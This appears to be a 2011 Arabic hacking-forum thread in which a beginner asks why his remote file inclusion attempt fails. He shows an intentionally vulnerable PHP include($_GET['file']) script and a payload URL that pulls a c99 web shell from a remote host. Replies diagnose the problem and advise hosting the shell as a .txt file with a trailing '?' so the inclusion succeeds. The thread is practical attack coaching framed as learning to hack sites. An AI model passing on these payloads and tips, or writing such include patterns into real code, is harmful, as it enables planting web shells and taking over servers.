المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : مشكله في ثغرة rfi



seifo2012
03-29-2011, 04:54 PM
السلام عليكم ورحمة الله وبركاته

اخواني انا لسه مبتدأ في عالم الهكر وفي اول بدايه ليا في الهكر وقفت قدامي مشكله اتمني انكم تحلوها

المشكله صادفتني في ثغرة remote file include
انا عملت ملف php عادي وحطيت جواه الانكلود عادي

<?php
include($file);
?>


وبعد كده لما بروح علي المتصفح علشان اربط الشيل بالمتغير file
http://localhost/rfi.php?file=http://xxxxxxxx/c99.php?
مش بيفتح حاجه بيفضل عارض المشكله
Warning: main() [function.include]: Failed opening '' for inclusion (include_path='.;c:\php4\pear') in C:\wamp\www\rfi.php on line 3

مش عارف المشكله من ايه لكن انا عملت طريقه تانيه وهي


<?php
$file = $_GET['file'];
include($file);
?>


ودخلت علي نفس الرابط ودخل علي الشيل تمام

بس حد ممكن يعرفني ايه مشكلتي

مع العلم اني غيرت اكتر من نسخة php 4 او نسخه 5

e . V . E . L
03-29-2011, 06:11 PM
اخي الموقع ليس مصاب او ان المتغير ليس صحيح ..

وهذي الثغرة منقرضة من عهد هتلر

seifo2012
03-29-2011, 06:37 PM
اخي الموقع ليس مصاب او ان المتغير ليس صحيح ..

وهذي الثغرة منقرضة من عهد هتلر

مشكور اخي علي ردك انا عارف انها منقرضه بس كل دورات الهكر بتبدأ بالثغره ديه فما بالك اني مش عارف اجتازها وانا لسه بتعلم انا مش عارف المشكله وبعدين انا مش مجربها علي موقع انا مجربها علي السيرفر الشخصي عادي والكود موجود قدامك

ياريت حد يقدر يساعدني

The shadow
03-30-2011, 12:51 AM
مثل ما قال الأخ ايفل هذه الثغرة منقرضة
اما خطأك هو انك تحط في الرابط هاذ http://localhost/rfi.php?file=http://xxxxxxxx/c99.php? (http://links.aljyyosh.info/?http://localhost/rfi.php?file=http://xxxxxxxx/c99.php?) الشيل مرفوع بصيغة php
اخي لازم ترفع الشيل بصيغة txt وما تنسى اشارة الإستفهام في اخر الرابط
تحياتي